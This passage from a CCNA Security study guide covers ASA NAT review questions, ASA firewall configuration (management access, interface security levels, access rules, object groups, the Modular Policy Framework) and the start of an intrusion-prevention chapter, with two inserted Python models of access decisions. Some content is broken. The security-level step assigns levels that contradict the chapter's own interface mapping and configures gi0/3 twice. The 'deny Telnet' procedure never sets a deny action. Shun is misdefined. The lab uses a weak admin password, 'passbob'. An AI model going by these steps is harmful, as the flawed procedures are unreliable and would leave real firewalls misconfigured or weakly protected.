In this chapter, you learned about the three forms of NAT: static NAT, dynamic NAT, and PAT. You also learned about the NAT options available in the ASA. You learned about the benefits of NAT and how to configure it and verify its operation. Class maps, policy maps, and service policies and their respective functions in a zone-based firewall were covered as well. Finally, the steps to configure and verify a zone-based firewall ended the chapter.
Exam Essentials
Identify the forms of Network Address Translation (NAT). These include static NAT, dynamic NAT, and Port Address Translation (PAT).
Describe the three sections of the NAT table in the ASA. The Manual NAT section represents translations that have been defined to be applied by the appliance before the other sections are consulted. The Auto NAT section represents translations that are defined on the object itself. The Manual NAT After Auto NAT section contains more general translations not handled by the first two sections.
Identify benefits of policy NAT. In some scenarios, you may need more options than are available with Auto NAT, or you may need to specify exceptions to the Auto NAT rules. By using the Manual NAT section, these options will be available to you. This section also has the advantage of being checked for a translation match before the other two sections.
Verify NAT operations. There are several ways to verify that NAT is operating correctly. They include viewing the NAT translations in the translation table using the show xlate command, and in cases where you are not getting any NAT translations, you can view the configuration and check for errors using the show nat command.
Describe the components of a zone-based firewall configuration. Class maps are used to define traffic classes, and policy maps are used to apply policies (actions) to these traffic classes. Finally, service policies are used to activate policy maps on zone pairs.
List the steps to configure zone-to-zone access. From a high level, to configure zone-to-zone access, the following steps must be performed: 1) define zones, 2) define zone pairs, 3) define class maps that define traffic, 4) define policy maps that apply actions to the class maps, 5) apply policy maps to zone pairs, and 6) assign interfaces to zones.
Review Questions
1. In which type of NAT is each private IP address manually mapped to a public IP address?
A. Dynamic
B. Static
C. PAT
D. SAT
2. Which section of the NAT table in the ASA is read last?
A. Auto NAT
B. Manual NAT
C. Dynamic NAT
D. Manual NAT After Auto NAT
3. You need to create a mapping for an internal device that is effective only when the internal device is communicating with one specific exterior device and not effective otherwise. What type of NAT must you use?
A. Auto NAT
B. Static NAT
C. Dynamic NAT
D. Policy NAT
4. What command generated the following output?
3 in use, 3 most used
PAT Global 103.61.3.9(0) Local 10.1.1.15 ICMP id 340
PAT Global 103.61.3.9(1024) Local 10.1.1.15(1028)
PAT Global 103.61.3.9(1024) Local 10.1.1.15(516)
A. show nat
B. show nat detail
C. show xlate
D. show pat
5. In the following command output, what does the r stand for?
TCP PAT from inside:10.1.1.15/1026 to outside:103.61.3.9/1024 flags ri
UDP PAT from inside:10.1.1.15/1028 to outside:103.61.3.9/1024 flags ri
ICMP PAT from inside:10.1.1.15/21505 to outside:103.61.3.9/0 flags ri
A. Routed
B. Remote
C. Port Address Translation
D. Reverse
6. Which of the following are collections of networks?
A. Zone pairs
B. Zones
C. Policy maps
D. Class maps
7. A match statement can be based on all of the following except which one?
A. An ACL
B. Protocol
C. Another class map
D. Device name
8. Which of the following actions triggers stateful inspection of the traffic?
A. Drop
B. Permit
C. Inspect
D. Pass
9. Which zone has no interface members?
A. DMZ
B. Self
C. Inside
D. Outside
10. In which type of NAT are all private IP addresses mapped to a single public IP address?
A. Dynamic
B. Static
C. PAT
D. SAT
11. In the following command output, what does the value 21505 represent?
TCP PAT from inside:10.1.1.15/1026 to outside:103.61.3.9/1024 flags ri
UDP PAT from inside:10.1.1.15/1028 to outside:103.61.3.9/1024 flags ri
ICMP PAT from inside:10.1.1.15/21505 to outside:103.61.3.9/0 flags ri
A. Destination port number
B. Sequence number
C. Source port number
D. Acknowledgment number
12. Which of the following is used to define traffic classes?
A. Service policy
B. Zones
C. Policy maps
D. Class maps
13. What command defines a security zone?
A. Zone member
B. Zone security
C. Set zone
D. Zone
14. Traffic to manage the device using SSH would belong to what zone?
A. Inside
B. DMZ
C. Self
D. Outside
15. What command assigns an interface to a zone?
A. zone-member
B. zone-security
C. set zone
D. zone
16. Which of the following is used to apply actions to traffic classes?
A. Service policy
B. Zones
C. Policy maps
D. Class maps
17. Which of the following is used to define a unidirectional firewall policy?
A. Zone pairs
B. Zones
C. Policy maps
D. Class maps
18. In the following command output, what does the i stand for?
TCP PAT from inside:10.1.1.15/1026 to outside:103.61.3.9/1024 flags ri
UDP PAT from inside:10.1.1.15/1028 to outside:103.61.3.9/1024 flags ri
ICMP PAT from inside:10.1.1.15/21505 to outside:103.61.3.9/0 flags ri
A. Inside address port
B. Interior
C. IGP
D. Static NAT
19. In which section of the NAT table in the ASA are translations defined on the object itself?
A. Auto NAT
B. Manual NAT
C. Dynamic NAT
D. Manual NAT After Auto NAT
20. In which type of NAT is a pool of public IP addresses obtained that is at least equal to the number of private IP addresses that require translation?
A. Dynamic
B. Static
C. PAT
D. SAT
Chapter 15 Configuring the Firewall on an ASA
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
5.5 Firewall features on the Cisco Adaptive Security Appliance (ASA) 9.x
Configure ASA access management
Configure security access policies
Configure Cisco ASA interface security levels
Configure default Cisco Modular Policy Framework (MPF)
Describe modes of deployment (routed firewall, transparent firewall)
Describe methods of implementing high availability
Describe security contexts
Describe firewall services
There are many additional firewall concepts you also should understand beyond configuring zone-based firewalling and network address translation. In this chapter we'll look at some other firewall services as well as discuss the difference between a routed and a transparent firewall. Moreover, we'll cover security contexts and configuring ASA management access. Finally, toward the end of this chapter the Modular Policy Framework approach to configuration will be covered.
In this chapter, you will learn the following:
Configuring ASA access management
Configuring security access policies
Configuring Cisco ASA interface security levels
Configuring the default Cisco Modular Policy Framework (MPF)
Modes of deployment (routed firewall, transparent firewall)
Methods of implementing high availability
Security contexts
Firewall services
Understanding Firewall Services
The Cisco ASA 9.x firewall series (which is the firewall tested in the CCNA Security exam) has a rich set of features to offer. While it certainly can perform the firewall duties we have come to expect from any enterprise-level firewall, such as traffic filtering and control, it also offers many other functions. Among these are:
Application Inspection Control (AIC)—Also called application protocol control, this feature verifies the conformance of major application layer protocol operations to RFC standards. It can help prevent many of the tunneling attempts and application layer attacks that violate protocol specifications.
Network Address Translation (NAT)—As you learned in Chapter 14, the ASA supports many implementations of NAT, including policy NAT, inside and outside NAT, one-to-one and one-to-many NAT, and port forwarding (static NAT).
IP Routing—The ASA has routing capabilities including static and dynamic routing with support for all major routing protocols such as EIGRP, RIP, OSPF, and BGP.
IPv6 support—The ASA supports IPv6 networking natively and can control access between IPv6 security domains.
DHCP—The ASA can be integrated as either a DHCP server or a DHCP client.
Multicast support—The ASA natively integrates with multicast networks, supporting Internet Group Management Protocol (IGMP) and both Protocol Independent Multicast Sparse Mode (PIM-SM) and bidirectional Protocol Independent Multicast (PIM).
Understanding Modes of Deployment
The ASA can be deployed in one of two modes, routed and transparent. The mode you choose will depend on requirements and needs. In this section, we differentiate these two modes of operation.
Routed Firewall
In routed mode, the ASA is serving as a router and thus each of its interfaces will reside in a separate IP subnet. It can use all major routing protocols including RIP, EIGRP, OSPF, and BGP. In environments where static routing is in use, it can use IP SLA to perform static route tracking to detect when one static route is unavailable and therefore switch to a second static route.
Transparent Firewall
In transparent mode, the ASA is not acting as a router and assumes a layer 2 identity much as a switch does. This makes the ASA transparent to devices on either side (from a layer 3 perspective); thus the name transparent mode. As with a switch, however, it is possible to configure the ASA with a management IP address for connecting to and managing the ASA.
Understanding Methods of Implementing High Availability
Regardless of whether the ASA is operating in routed or transparent mode, it is providing valuable services to the network. Therefore, providing high availability for the ASA and thus for the services it provides is highly desirable. The ASA has several redundancy options available to satisfy this need. In this section we'll cover three ways that multiple ASAs can be deployed to provide this redundancy.
Active/Standby Failover
In Active/Standby failover, two security appliances are deployed with only one of the appliances processing traffic while the second one serves as a hot standby. This deployment model is shown in Figure 15.1.
FIGURE 15.1 Active/Standby failover
Active/Active Failover
In Active/Active failover, two security appliances are deployed with both appliances processing traffic, with the ability to survive a single device failure. This deployment model is shown in Figure 15.2.
FIGURE 15.2 Active/Active failover
Clustering
In clustering, three or more security appliances are deployed as a single logical device. This allows for the management of the multiple ASAs as a unit. It provides increased throughput and redundancy. This deployment model is shown in Figure 15.3.
FIGURE 15.3 Clustering
Understanding Security Contexts
The ASA can be partitioned into multiple virtual firewalls or security contexts. Each context can have its own interfaces, policies, and administrators. This results functionally in multiple virtual firewalls as shown in Figure 15.4, where multiple contexts are being used to support multiple customers.
FIGURE 15.4 Security contexts
Configuring ASA Management Access
While many administrators choose to manage and configure the ASA using the Adaptive Security Device Manager (ASDM), when you deploy a new ASA you will have to begin by setting up the ASA using the CLI. Only after an interface with an IP configuration is enabled will you be able to connect to the device using the ASDM. We will first cover this initial configuration and will then follow with the commands required to allow connections for the ASDM.
Initial Configuration
To perform the initial configuration of the ASA, connect to the device from the console port and perform the operations covered in the next procedure.
Initial Configuration of the ASA
In this procedure, you will configure the interfaces of the ASA with IP addresses, subnet masks, and security levels. Finally, you will enable those interfaces.
1. Connect to the ASA using a console cable.
2. Enter interface configuration mode for the external (Internet facing) interface.
asa70(config)# int Gi0/1
asa70(config-if)#
3. Configure an IP address and subnet mask for the interface.
asa70(config-if)# ip address 201.16.5.5 255.255.255.0
4. Give the interface a name. In this case, name it outside.
asa70(config-if)# nameif outside
5. Enable the interface.
asa70(config-if)# no shutdown
6. Using the same commands, configure and enable two other interfaces, naming the interface leading to the DMZ as dmz and the interface leading to the private network (the LAN) inside.
asa70(config)# int gi0/2
asa70(config-if)# ip address 172.168.5.5 255.255.255.0
asa70(config-if)# nameif dmz
asa70(config-if)# no shutdown
asa70(config)# int gi0/3
asa70(config-if)# ip address 192.168.5.5 255.255.255.0
asa70(config-if)# nameif inside
asa70(config-if)# no shutdown
7. Now we need to enable the HTTP server on the ASA, which is required to connect to the device using the ASDM.
asa70(config)# http server enable
8. Now we will define an IP address on the inside network that will be allowed to connect to the ASA using either SSH or HTTP to manage the ASA.
asa70(config)# http 192.168.5.20 255.255.255.255 inside
asa70(config)# ssh 192.168.5.20 255.255.255.255 inside
9. Finally we'll create a local account on the ASA for the technician who will connect using HTTP or SSH and enable local authentication on the ASA. The username will be Bob and the password passbob. Give him level 15 (admin) access.
asa70(config)# username bob password passbob privilege 15
10. Normally at this point one would also configure a security level. We will do that in the next exercise after we discuss security levels.
Configuring Cisco ASA Interface Security Levels
Before we get into interface configuration we need to discuss a concept that may be new to you if you have only configured routers. In the ASA, interfaces have security levels. These security levels are one of the ways the ASA controls access from one interface to another. Security levels define the trustworthiness of the interface. The higher the level, the more trusted the interface.
Security Levels
The most common configuration is to set the exterior interface (Internet) to a level of zero (or something very low in relation to the other interfaces) and the interior interface (LAN) to a very high security level value. Any other interfaces (such as a DMZ) can be set to a level that properly reflects the trust placed in that interface. With this configuration in place the typical traffic flows in your network will be as follows:
Inbound traffic will flow from a low-security interface to a high-security interface. Another way of saying this is that it will flow from a less trusted interface to a more trusted interface.
Outbound traffic will flow from a high-security interface to a low-security interface. Another way of saying this is that it will flow from a more trusted interface to a less trusted interface.
By default, the ASA uses these rules to control traffic between interfaces:
There is an implicit permit for traffic flowing from a high-security interface to a low-security interface.
There is an implicit deny for traffic flowing from a low-security interface to a high-security interface.
There is an implicit deny for traffic flowing between two interfaces with the same security level.
Of course, these defaults can be changed and often are changed. Figure 15.5 shows how this would work using security level values 0, 50, and 100. Green lines represent allowed traffic while the red lines represent denied traffic.
FIGURE 15.5 Security levels in action
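The three default rules above are easy to get backwards when reading a design, so here they are encoded as a function, with a matrix built over the inside/dmz/outside levels used in this chapter's procedures. This is an added example for this section, not Cisco code. The optional same_security flag stands in for the ASA's same-security-traffic permit inter-interface setting, which this example assumes exists as the way to change the third default; the book's text only says the defaults can be changed.

```python
"""Implicit interface-to-interface decisions by ASA security level (added example)."""


def direction(src_level, dst_level):
    """'outbound' = more trusted to less trusted, 'inbound' = the reverse."""
    if src_level > dst_level:
        return "outbound"
    if src_level < dst_level:
        return "inbound"
    return "same-level"


def implicit_action(src_level, dst_level, same_security=False):
    """Default action when no access rule is applied to the interfaces."""
    if src_level > dst_level:
        return "permit"            # high -> low: implicit permit
    if src_level < dst_level:
        return "deny"              # low -> high: implicit deny
    # Equal levels are denied unless same-security traffic has been
    # permitted (assumed to be the inter-interface setting; see lead-in).
    return "permit" if same_security else "deny"


def flow_matrix(levels, same_security=False):
    """Map (src_if, dst_if) -> (direction, action) for every ordered pair."""
    result = {}
    for src, sl in levels.items():
        for dst, dl in levels.items():
            if src == dst:
                continue
            result[(src, dst)] = (direction(sl, dl),
                                  implicit_action(sl, dl, same_security))
    return result


def permitted_flows(levels, same_security=False):
    """Sorted list of interface pairs that pass without an access rule."""
    return sorted(pair for pair, (_, action)
                  in flow_matrix(levels, same_security).items()
                  if action == "permit")


# Constructed to match the chapter's scenario: inside 100, dmz 50, outside 0.
CHAPTER_LEVELS = {"inside": 100, "dmz": 50, "outside": 0}
```

With the chapter's levels only three of the six possible flows are implicitly permitted (inside to dmz, inside to outside, dmz to outside); every inbound flow, including outside to the DMZ, needs an explicit access rule, which is what the "Interface Access Rules" section below goes on to configure.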
Setting Security Levels
In this procedure, you will configure the interfaces of the ASA with security levels reflecting the relative trustworthiness of the inside, outside, and dmz interfaces. The interfaces in this procedure align with the last procedure, NOT with Figure 15.5, which is a different example.
1. Enter interface configuration mode for the inside, outside, and dmz interfaces and assign the security levels 100, 50, and 0 respectively.
asa70(config)# int gi0/3
asa70(config-if)# security-level 100
asa70(config-if)# int gi0/2
asa70(config-if)# security-level 50
asa70(config-if)# int gi0/3
asa70(config-if)# security-level 0
At this point you should be able to connect to the ASA using the ASDM as Bob from the machine at 192.168.5.20.
Configuring Security Access Policies
In its role as a firewall, the ASA uses security access policies to control the traffic types allowed to flow from one interface to another. These access policies can be configured as interface access rules (much like the ACLs you may have experience with on a router) or by creating and linking object groups. In this section, we'll discuss both methods.
Interface Access Rules
If you apply no interface access rules on the ASA, the default rules (as covered earlier) are:
There is an implicit permit for traffic flowing from a high-security interface to a low-security interface.
There is an implicit deny for traffic flowing from a low-security interface to a high-security interface.
There is an implicit deny for traffic flowing between two interfaces with the same security level.
This means that you will need to create an access rule to allow traffic in each of the following scenarios:
Between interfaces of the same security level
Traffic from a lower-security interface to a higher-security interface
When Using NAT!
ACLs that permit traffic from a lower-security interface to a higher-security interface must reference the "real" or non-translated IP address of the inside host rather than the translated or mapped IP address.
While interface rules operate like ACLs, you may (depending on your CLI experience with the ASA) find it easier to create these rules in the ASDM rather than at the command line. In the next procedure, you will see how this is done in the ASDM.
Creating Interface Access Rules in ASDM
In this procedure, you will configure two interface access rules in the ASDM. The ASA you manage has three interfaces that you have labeled inside (LAN), outside (Internet), and dmz. The security levels you have assigned are 100, 0, and 50 respectively. Currently the only rules in place are the global default rules discussed in the first set of bullet points in the section "Interface Access Rules" earlier in this chapter.
You need to configure the following rules:
Allow only HTTP access from the outside interface to the dmz.
Allow only HTTP from the inside to the dmz.
1. Connect to the ASA with the ASDM.
2. Navigate to Configuration > Firewall > Access Rules.
3. Click Add, and choose Add Access Rule.
4. We will first create the rule allowing only HTTP access from the outside interface to the dmz. In the Add Access Rule dialog box, select outside as the interface on which to apply the rule. In the Action section, select the Permit radio button. In the drop-down box for source IP address, select ANY. In the drop-down box for destination IP address, select ANY. In the Service box, type or select HTTP. Click OK. On the ASDM main page, click Apply.
5. Click Add, and choose Add Access Rule.
6. We will next create the rule allowing only HTTP access from the inside interface to the dmz. In the Add Access Rule dialog box, select inside as the interface on which to apply the rule. In the Action section, select the Permit radio button. In the drop-down box for source IP address, select ANY. In the drop-down box for destination IP address, select ANY. In the Service box, type or select HTTP. Click OK. On the ASDM main page, click Apply.
The configuration is now complete.
Object Groups
While the previous procedure used the keyword ANY to select source and destination and HTTP for service, not very many configurations are that simple. In many cases we need to allow only a select group of devices rather than all devices, or we need to allow only devices on a specific network to send traffic on an interface when there are multiple networks that might be traversing that interface. To make the creation and application of rules easier, the ASA can also use an object-based model for certain rules.
Objects can be created to represent any of the following:
Networks
Individual hosts
Groups of services
Resources
Once these objects have been created, they can be linked together to create rules as we did in the previous procedure, simply using the browse button next to each of the drop-down boxes in the Add Access Rule dialog box to link them together. In the next procedure, you will create objects and then use them in an access rule.
Creating and Using Objects in an Access Rule
In this procedure, you will create three objects and use them in an access rule. You need to allow HTTP traffic from the 192.168.5.0/24 network inside the LAN to a web server with the IP address of 201.3.3.3 in the DMZ. Therefore, you will
Create a network object to represent the 192.168.5.0/24 network
Create a service object to represent HTTP
Create a host object to represent the server at 201.3.3.3
Link these objects in an access rule and apply it to the inside interface
Note: interface objects have been created and named inside, outside, and dmz with security levels of 100, 0, and 50.
1. Connect to the ASA with the ASDM.
2. Navigate to Configuration > Firewall > Objects > Network Objects/Groups.
3. Select Add, then Network Object.
4. In the Name field, enter HTTP_group_internal.
5. In the IP address and network mask sections, enter 192.168.5.0 and 255.255.255.0. Then select OK.
6. Select Add, then Network Objects/Groups.
7. In the Name field, enter DMZ_web.
8. In the IP address section, enter 201.3.3.3. Then select OK.
9. Select Object, then Service Objects/Groups, and finally Add Service Group.
10. In the Add Service Group dialog box, enter the name DMZ_services.
11. In the Existing service group section, select TCP-HTTP and TCP-HTTPS and select Add. Then click OK.
12. In the main ASDM window, select Apply to create the objects.
13. Navigate to Configuration > Firewall > Access Rules.
14. Click Add, and choose Add Access Rule.
15. In the Add Access Rule dialog box, select inside as the interface on which to apply the rule. In the Action section, select the Permit radio button. In the drop-down box for source IP address, select the object you created called HTTP_group_internal. In the drop-down box for destination IP address, select the object you created called DMZ_web. In the Service box, select the object you created called DMZ_services. Click OK. On the ASDM main page, click Apply.
The configuration is now complete.
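The decision logic behind the default security-level rules and the two ASDM procedures above, as an added Python model that is not from the book or from Cisco. The interface names, security levels, object names and rules are the chapter's; the function names and the outside addresses 198.51.100.7 and 203.0.113.10 are constructed for the example. It also shows a caveat the procedures leave implicit: once any access rule is applied on an interface, that ACL's implicit deny replaces the implicit high-to-low permit for all traffic entering the interface.

```python
import ipaddress
from dataclasses import dataclass

# Added example, not from the book or from Cisco: a model of the ASA's
# interface-to-interface access decision. Interface names, security levels,
# object names and rules reproduce the chapter's scenarios; the function
# names and outside addresses (198.51.100.7, 203.0.113.10) are constructed.

# Interface name -> security level (inside 100, dmz 50, outside 0).
INTERFACES = {"inside": 100, "dmz": 50, "outside": 0}

# Network objects from the object procedure; a host object is a /32.
# "any" stands for the ANY keyword used in the interface-rule procedure.
NETWORK_OBJECTS = {
    "HTTP_group_internal": ipaddress.ip_network("192.168.5.0/24"),
    "DMZ_web": ipaddress.ip_network("201.3.3.3/32"),
    "any": ipaddress.ip_network("0.0.0.0/0"),
}

# Service objects: sets of (protocol, destination port).
SERVICE_OBJECTS = {
    "HTTP": {("tcp", 80)},
    "DMZ_services": {("tcp", 80), ("tcp", 443)},   # TCP-HTTP + TCP-HTTPS
}


@dataclass(frozen=True)
class AccessRule:
    action: str        # "permit" or "deny"
    source: str        # network object name
    destination: str   # network object name
    service: str       # service object name


# A policy maps an interface name to the access rules applied on it. Rules
# apply to traffic entering the ASA from that interface, whatever the
# destination interface; a rule with destination "any" therefore also
# permits traffic toward every other interface, not only the dmz.
Policy = dict[str, list[AccessRule]]


def default_action(src_if: str, dst_if: str) -> str:
    """The implicit rules used when no access rule is applied on src_if."""
    if INTERFACES[src_if] > INTERFACES[dst_if]:
        return "permit"  # implicit permit: high-security to low-security
    return "deny"        # implicit deny: low to high, or equal levels


def rule_matches(rule: AccessRule, src_ip, dst_ip, proto: str, dport: int) -> bool:
    return (src_ip in NETWORK_OBJECTS[rule.source]
            and dst_ip in NETWORK_OBJECTS[rule.destination]
            and (proto, dport) in SERVICE_OBJECTS[rule.service])


def evaluate(policy: Policy, src_if: str, dst_if: str,
             src_ip: str, dst_ip: str, proto: str, dport: int) -> str:
    """Decide 'permit' or 'deny' for a new flow entering on src_if.

    Addresses are the real (untranslated) addresses, as the NAT note requires.
    Once any access rule is applied on src_if, the rules are evaluated
    top-down and end in an implicit deny: the high-to-low implicit permit
    no longer applies to traffic entering that interface.
    """
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    rules = policy.get(src_if)
    if not rules:
        return default_action(src_if, dst_if)
    for rule in rules:
        if rule_matches(rule, src, dst, proto, dport):
            return rule.action
    return "deny"


def chapter_policy() -> Policy:
    """The rules configured in the two ASDM procedures above."""
    return {
        # Interface access rule on outside: permit HTTP from ANY to ANY.
        "outside": [AccessRule("permit", "any", "any", "HTTP")],
        # Object-based rule on inside: LAN network -> DMZ_web, DMZ_services.
        "inside": [AccessRule("permit", "HTTP_group_internal", "DMZ_web",
                              "DMZ_services")],
    }


def demo() -> dict:
    """Decisions before and after the chapter's rules are applied."""
    policy = chapter_policy()
    return {
        # Defaults only: high-to-low passes, low-to-high does not.
        "default inside->outside": evaluate({}, "inside", "outside",
                                            "192.168.5.20", "203.0.113.10", "tcp", 443),
        "default outside->inside": evaluate({}, "outside", "inside",
                                            "198.51.100.7", "192.168.5.20", "tcp", 80),
        # Intended flows are permitted by the configured rules...
        "rule inside->dmz http": evaluate(policy, "inside", "dmz",
                                          "192.168.5.20", "201.3.3.3", "tcp", 80),
        "rule outside->dmz http": evaluate(policy, "outside", "dmz",
                                           "198.51.100.7", "201.3.3.3", "tcp", 80),
        # ...but applying a rule on inside also removes the implicit permit
        # for inside->outside, which the procedure does not point out.
        "rule inside->outside https": evaluate(policy, "inside", "outside",
                                               "192.168.5.20", "203.0.113.10", "tcp", 443),
    }
```

The last entry returned by demo() is the one to watch in practice: a lab rule that only permits LAN-to-DMZ HTTP silently cuts off the LAN's Internet access until a further permit is added.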
Configuring Default Cisco Modular Policy Framework (MPF)
In Chapters 4 and 14 you learned about the Cisco Modular Policy Framework (MPF). As review, there are three components that are used as building blocks to implement policies in this framework:
Class maps are used to categorize traffic types into classes. ACLs are typically used to define the traffic, and then the ACL is referenced in the class map.
Policy maps are used to define the action to be taken for a particular class. Actions that can be specified are allow, block, and rate-limit.
Service policies are used to specify where the policy map should be implemented.
In the next procedure, you will use this framework to create a new policy by creating a class map that identifies Telnet as the traffic and a policy map that identifies an action of deny, and apply the two to all interfaces with a service policy.
Configuring Default Cisco Modular Policy Framework (MPF)
In this exercise, you will create a new policy by creating a class map that identifies Telnet as the traffic and a policy map that identifies an action of deny, and apply the two to all interfaces with a service policy.
1. Connect to the ASA with the ASDM.
2. Navigate to Configuration > Firewall > Service Policy Rules and click Add, then Service Policy Rule.
3. Name the service policy No_telnet and select the Global radio button (which applies it to all interfaces). Click Next.
4. In the Traffic Class Criteria dialog box, select Create A New Traffic Class. Name the class Telnet_deny.
5. In the Traffic Match Criteria section, check the box for TCP Or UDP Destination Port and select Next.
6. In the service field of the next box, enter TCP/23 in both the Source and Destination fields. Click Next.
7. Select Finish. The configuration is complete.
Summary
In this chapter, you learned how to set up the ASA so you can remotely administer it using the ASDM. You also learned the default security policies that are in place and how the default global policy interacts with configured policies. You also learned about interface security levels and the effect they have on traffic flows. The chapter reviewed the Cisco Modular Policy Framework and how it is used to create policies. It also discussed the difference between a transparent and a routed firewall. Finally, high-availability solutions were introduced, including active-active, active-passive, and clustering approaches.
Exam Essentials
Identify firewall services provided by the ASA. These include Application Inspection Control (AIC), Network Address Translation (NAT), IP routing, IPv6 support, DHCP, and multicast support.
Describe the two modes of deploying the ASA. The ASA can be deployed in one of two modes, routed and transparent. In routed mode, the ASA is serving as a router and thus each of its interfaces will reside in a separate IP subnet. In transparent mode, the ASA is not acting as a router and assumes a layer 2 identity much as a switch does.
Identify ASA high-availability methods. These include Active/Standby failover, Active/Active failover, and clustering.
Define security contexts in the ASA. The ASA can be partitioned into multiple virtual firewalls or security contexts. Each context can have its own interfaces, policies, and administrators.
Describe the steps required for initial setup of the ASA. These steps include assigning an IP address and mask to interfaces, enabling interfaces, and enabling the HTTP server. They also include permitting the remote management traffic generated when connecting with the ASDM.
List the default traffic rules in the ASA. By default, the ASA uses these rules to control traffic between interfaces: there is an implicit permit for traffic flowing from a high-security interface to a low-security interface, there is an implicit deny for traffic flowing from a low-security interface to a high-security interface, and there is an implicit deny for traffic flowing between two interfaces with the same security level.
Identify examples of items for which objects can be created in the ASA. Objects can be created to represent any of the following: networks, individual hosts, groups of services, or resources.
Describe the components of the Cisco Modular Policy Framework (MPF). There are three components that are used as building blocks to implement policies in this framework: class maps, used to categorize traffic types into classes (ACLs are typically used to define the traffic and then the ACL is referenced in the class map); policy maps, used to define the action to be taken for a particular class (actions that can be specified are allow, block, and rate-limit); and service policies, used to specify where the policy map should be implemented.
Review Questions
1. Which firewall feature can help prevent many tunneling attempts and application layer attacks?
A. AIC
B. NAT
C. DHCP
D. PIM-SIM
2. In which mode does the ASA assume a layer 2 identity?
A. Switch
B. Transparent
C. Active/Standby
D. Routed
3. In which high-availability approach are three or more security appliances deployed as a single logical device?
A. Active/Active
B. Stackwise
C. Clustering
D. Active/Standby
4. What is it called when the ASA is partitioned into multiple virtual firewalls?
A. security contexts
B. security domains
C. security realms
D. security areas
5. Which command is used to apply the name outside to an interface on the ASA?
A. asa70(config-if)# name outside
B. asa70(config-if)# nameif outside
C. asa70(config-if)# outside
D. asa70(config)# nameif outside
6. Which command is required to connect to the device using the ASDM?
A. asa70(config)# http server
B. asa70(config)# http enable
C. asa70(config)# http server enable
D. asa70(config)# enable http server
7. Which command defines an IP address on the inside network that will be allowed to connect to the ASA using HTTP to manage the ASA?
A. asa70(config)# http 192.168.5.20 255.255.255.255
B. asa70(config)# http 192.168.5.20/32 inside
C. asa70(config)# http 192.168.5.20 inside
D. asa70(config)# http 192.168.5.20 255.255.255.255 inside
8. What value is used to determine the allowed traffic flows between the interfaces in the ASA?
A. security level
B. IP address
C. MAC address
D. name
9. There is an implicit permit for traffic flowing from a ________ security interface to a ________ security interface.
A. low, low
B. high, low
C. high, high
D. low, high
10. Which command assigns the security level 100 to an interface?
A. asa70(config)# security 100
B. asa70(config)# 100 security-level
C. asa70(config)# security-level 100
D. asa70(config)# level 100
11. In which of the following scenarios will you need to create an access rule to allow traffic?
A. between interfaces of the same security level
B. traffic to the self-zone
C. traffic from a higher-security interface to a lower-security interface
D. in all scenarios
12. Which of the following is used to represent a select group of devices rather than all devices in a network?
A. service policy
B. object group
C. policy map
D. security group
13. Which of the following is used to categorize traffic types in the MPF?
A. zone pairs
B. zones
C. policy maps
D. class maps
14. You would like to apply a service policy to all interfaces of the ASA. What radio button do you choose for this in the ASDM?
A. global
B. composite
C. self
D. all
15. You need to allow HTTP traffic from the 192.168.5.0/24 network inside the LAN to a web server with the IP address of 201.3.3.3 in the DMZ. What type of object do you create to represent the HTTP traffic?
A. network object
B. service object
C. host object
D. resource object
16. Which of the following is used to specify where a policy map should be implemented in the MPF?
A. zone pairs
B. zones
C. service policy
D. class maps
17. The ASA you manage has three interfaces that you have labeled inside (LAN), outside (Internet), and dmz. The security levels you have assigned are 100, 0, and 50 respectively. Currently the only rules in place are the global default rules. Which traffic is allowed?
A. inside to outside
B. outside to dmz
C. dmz to outside
D. inside to dmz
18. In the following command, what does inside represent? asa70(config)# ssh 192.168.5.20 255.255.255.255 inside
A. ACL name
B. security level
C. interface IP address
D. traffic direction
19. Which of the following is used to define the action to be taken for a traffic type in the MPF?
A. zone pairs
B. zones
C. policy maps
D. class maps
20. There is an implicit deny for traffic flowing from a ________ security interface to a ________ security interface.
A. low, low
B. high, low
C. high, high
D. low, high
Chapter 16 Intrusion Prevention
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
6.1 Describe IPS deployment considerations
Network-based IPS vs. host-based IPS
Modes of deployment (inline, promiscuous - SPAN, tap)
Placement (positioning of the IPS within the network)
False positives, false negatives, true positives, true negatives
6.2 Describe IPS technologies
Rules/signatures
Detection/signature engines
Trigger actions/responses (drop, reset, block, alert, monitor/log, shun)
Blacklist (static and dynamic)
It is no longer acceptable to sit and wait for the next attack and react afterward. In today's threat-filled landscape, security professionals must take a proactive approach to preventing intrusions. Intrusion prevention systems are designed to identify and prevent attacks in real time. In this chapter, you will explore the intrusion prevention capabilities of the ASA.
In this chapter, you will learn the following:
Deployment options of an IPS
Advantages and disadvantages of an HIPS and an NIPS
Proper positioning of an IPS
Management of false positives and negatives
Threat identification methods
Methods of implementing high availability
Trigger actions
IPS Terminology
To begin this chapter, you'll learn a number of terms and concepts that apply to the process of intrusion prevention. A clear understanding of these will help support the rest of the chapter.
Threat
A threat is an identified security weakness to which any specific environment may or may not be vulnerable. For example, a threat might exist in the form of a new attack on Oracle database servers, but if you use Microsoft SQL Server, it is a threat to which you are not vulnerable. Risk is present only when a threat and a vulnerability to the threat both exist.
Risk
Risk is created when a threat exists to which a system is vulnerable. Unless these two conditions are both present, no risk exists.
Vulnerability
A vulnerability is any susceptibility to an external threat that a device or system may possess. A threat becomes a vulnerability only when the threat target is present in your environment and is in the state required to take advantage of the vulnerability. For example, if a threat to a file server exists only if the file server is lacking a security patch and your file server has the patch installed, the threat is not a vulnerability. Examples of vulnerabilities include the following:
Weak passwords
Missing security patches
Lack of input validation
Exploit
An exploit occurs when a threat and a vulnerability both exist and a threat actor takes advantage of the situation. The term exploit also refers to the specific tool or attack methodology used. Some examples include the following:
Scripts
Malware
Password crackers
Zero-Day Threat
A zero-day threat is any threat not yet remediated by malware vendors or software vendors. This type of threat cannot be detected through attack signature-based methods and is usually discovered only by malware or IPS/IDS software that uses heuristics. This approach identifies attacks by identifying traffic that is consistent with an attack rather than using a signature.
Actions
Actions refer to the operations that an intrusion prevention system (IPS) can take when an attack is recognized. Some examples of these actions are as follows:
Drop means the IPS quietly drops the packets involved.
Reset sends a packet with the RST flag that ends any TCP connection.
Shun accomplishes the same purpose as a reset for non-TCP connections.
Block is when the IPS directs another device (a router or firewall) to block the traffic.
Network-Based IPS vs. Host-Based IPS
The most common way to classify an IPS is based on its information source: network based and host based. A host-based intrusion prevention system (HIPS) is installed on the device (for the purposes of this discussion, a server), and the system focuses solely on identifying attacks on that device only. This is in contrast to a network-based system, which monitors all traffic that goes through it looking for signs of attack on any machine in the network.
Host-Based IPS
